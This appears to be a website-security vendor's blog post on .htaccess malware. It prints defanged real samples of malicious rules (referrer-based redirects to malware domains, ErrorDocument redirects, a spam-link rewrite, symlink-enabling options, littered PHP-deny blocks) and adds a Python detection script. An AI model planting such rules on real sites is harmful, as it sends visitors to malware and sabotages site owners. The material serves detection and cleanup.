The .htaccess file is notorious for being targeted by attackers. Whether it’s using the file to hide malware, redirect search engines to other sites with black hat SEO tactics, or inject content — the range of possibilities for misuse is vast, making it a prime target for hackers.
.htaccess malware can be hard to pinpoint and clean up since it allows an attacker to make multiple changes to the web server and its behavior. Furthermore, many site owners are unaware of this file due to it starting with a “.” (which makes it a hidden file). However, understanding the intricacies of the .htaccess file and its potential misuse is crucial for mitigating risk to your website. The stealthy nature of .htaccess malware, coupled with its ability to manipulate server behavior, makes it a silent yet potent threat.
In this post, we’ll explain what an .htaccess file is and why it’s such an attractive target for attackers. We’ll also cover some common examples of .htaccess malware and how to detect and respond to these threats to help protect your website and visitors.
The .htaccess file is a very versatile and powerful file specific to Apache server environments. It allows web administrators to make changes to the environment as a whole or on a per-directory basis. It can allow or deny access to certain IP addresses, referrers, and user agents.
It is also used to enable things like “pretty permalinks” in WordPress environments with the use of mod_rewrite. It is a very flexible and useful file — and that’s precisely why attackers will misuse this file for their own goals.
Let’s take a look at some common examples of .htaccess malware that you may find if your site has been compromised.
One of the more common attacks we’ve encountered is .htaccess redirects. This redirects users from search engines to malware utilizing the following instruction set:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
..
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ hxxp://villusoftreit[.]ru/in.cgi?3 [R=301,L]
This rule set checks the referrer for anyone visiting the site from the search engines listed, and then redirects the user to a page with malware (i.e. hxxp://villusoftreit[.]ru/in.cgi?3). Website owners are more likely to visit their website by entering the domain directly into their address bar rather than through a search engine. This makes it less likely that the website owner will notice the infection until someone tells them about it.
Here’s another example of an .htaccess redirect:
# BEGIN WordPress
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* hxxp://globalpoweringgatheringon[.]com/in.php?n=30 [R,L]
Another common type of attack involving the .htaccess file is redirecting error pages to malware, which can be even harder to detect. This is because most of the website functions normally. The redirect will only trigger on non-existent pages.
Here’s an example of what you’d find involving this type of attack:
RewriteEngine On
ErrorDocument 400 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 401 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 403 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 404 hxxp://powercrystal[.]ru/inject/index.php
ErrorDocument 500 hxxp://powercrystal[.]ru/inject/index.php
Another example:
ErrorDocument 400 hxxp://arthurlundt.cz[.]cc/ht_er_docs/
ErrorDocument 403 hxxp://arthurlundt.cz[.]cc/ht_er_docs/
[…truncated…]
ErrorDocument 404 hxxp://nicomagen.cz[.]cc/ht_er_docs/
ErrorDocument 405 hxxp://nicomagen.cz[.]cc/ht_er_docs/
Another way we have seen the .htaccess file abused is through spam link generation:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^[a-zA-Z0-9_-]+/([0-9]{1,7})([a-zA-Z0-9]{4})[a-zA-Z0-9_-]$ index.php?smsite=$2&smid=$1 [L]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This malware uses a regular expression that – when coupled with spam malware within the file structure – can generate hundreds of spam links on the website. These links then show up in the results of Google and other search engines and harm the website’s SEO.
A very common attack with WHM/cPanel environments is the misuse of symlinks. If symlink protection is disabled within WHM, attackers can use symlinks to move laterally throughout the environment and infect other websites or just create a flood of random spammy symlinks spread across the file structure.
This is made possible in part with the use of an .htaccess file placed in the directory in question:
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
This will instruct the server to follow symlinks to their destination and aid the attackers in spreading their malware throughout the environment.
Another attack that we have seen a lot of recently is the abuse of .htaccess files to deny access to website files. For example, we have seen the attackers litter hundreds, or sometimes thousands of .htaccess files throughout the website file structure with the following:
<FilesMatch ".(php|php5|phtml)$">
Order allow,deny
Deny from all
</FilesMatch>
This is a very simple .htaccess file which does nothing other than prevent PHP execution.
The file can function as a hardening measure when placed in a directory such as ./wp-content/uploads. However, when littered throughout the entire file structure, it can disrupt the functionality of the website and render the wp-admin panel useless, blocking the website administrator from performing maintenance or updates, or taking down the entire website.
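As an added example (not Sucuri’s SiteCheck or any code from this post), the following Python triage script flags the directive patterns shown in the examples above when run over a site’s .htaccess files, treating a PHP deny block as expected hardening only under wp-content/uploads. The SAMPLE input is constructed, and the defanged hxxp scheme is accepted so the post’s own samples can be fed in unchanged.

```python
"""Static triage of .htaccess content for the abuse patterns shown in this post.
Added example, not Sucuri's SiteCheck; the SAMPLE file below is constructed."""
import re

# "hxxp" is accepted so the defanged samples from the post can be fed in unchanged.
URL = r"(?:https?|hxxps?)://"
# (finding label, regex applied to one stripped, non-comment line)
RULES = [
    ("referrer-conditional rewrite", r"^RewriteCond\s+%\{HTTP_REFERER\}"),
    ("RewriteRule redirects off-site", r"^RewriteRule\s+\S+\s+" + URL),
    ("ErrorDocument points off-site", r"^ErrorDocument\s+\d{3}\s+" + URL),
    ("rewrite feeds captures into index.php query", r"^RewriteRule\s+\S+\s+\S*index\.php\?"),
    ("FollowSymLinks enabled", r"^Options\b.*FollowSymLinks"),
    ("directory listing enabled", r"^Options\b.*\+Indexes"),
    ("PHP served as plain text", r"^AddType\s+text/plain\b.*\.php"),
    ("PHP handed to server-parsed handler", r"^AddHandler\s+server-parsed\b.*\.php"),
    ("PHP access denied", r"^<FilesMatch\b.*php"),
]
RULES = [(label, re.compile(rx, re.I)) for label, rx in RULES]
# A PHP deny block is expected hardening here, sabotage when littered elsewhere.
HARDENED_DIRS = ("wp-content/uploads",)

def scan_htaccess(text, path=".htaccess"):
    """Return [(lineno, label, directive)] for lines matching an abuse pattern.
    `path` is the file's location under the docroot; it decides whether a PHP
    deny block counts as legitimate hardening or as a finding."""
    hardened = any(d in path.replace("\\", "/") for d in HARDENED_DIRS)
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for label, rx in RULES:
            if rx.search(line) and not (hardened and label == "PHP access denied"):
                findings.append((lineno, label, line))
    return findings

SAMPLE = """# constructed sample mixing the patterns from the post
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC]
RewriteRule ^(.*)$ hxxp://redirect.example/in.cgi?3 [R=301,L]
ErrorDocument 404 hxxp://errors.example/index.php
Options +FollowSymLinks +Indexes
AddHandler server-parsed .php
<FilesMatch "\\.(php|php5|phtml)$">
Deny from all
</FilesMatch>
"""
```

Run it over every file returned by `find /path/to/docroot -name .htaccess`, passing each path to `scan_htaccess`; a large number of hits for the PHP deny pattern outside wp-content/uploads is the littering pattern described above.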
Our free remote website scanner SiteCheck is able to detect many of these .htaccess attacks on your site. Simply enter your URL into the search bar and SiteCheck will scan your site for malicious code.
Remote scanners do have limitations, however. For a complete website scan you’ll also want to scan your website server and database for any suspicious code and indicators of compromise. Learn more about this functionality from our website monitoring page or chat with one of our experienced analysts to discuss implementation.
Detected malicious .htaccess behavior or related indicators of compromise? We’ve put together a comprehensive step-by-step guide on how to fix a hacked website.
As a quick recap, you’ll want to do the following if your site has malware:
If you’ve been hacked and you need a hand cleaning up the infection, our experienced security analysts are available 24/7 to help clean up an infection. Reach out — they love to chat!
The best way to prevent an infection in the first place is to proactively implement security measures. That means hardening your website, using strong passwords for all of your accounts, and securing your site against vulnerabilities and threats. Sucuri offers a comprehensive website security service that can help you monitor your site and respond to threats.
Not sure about getting complete website security right now? Try our website firewall free for 30-days and see the results for yourself.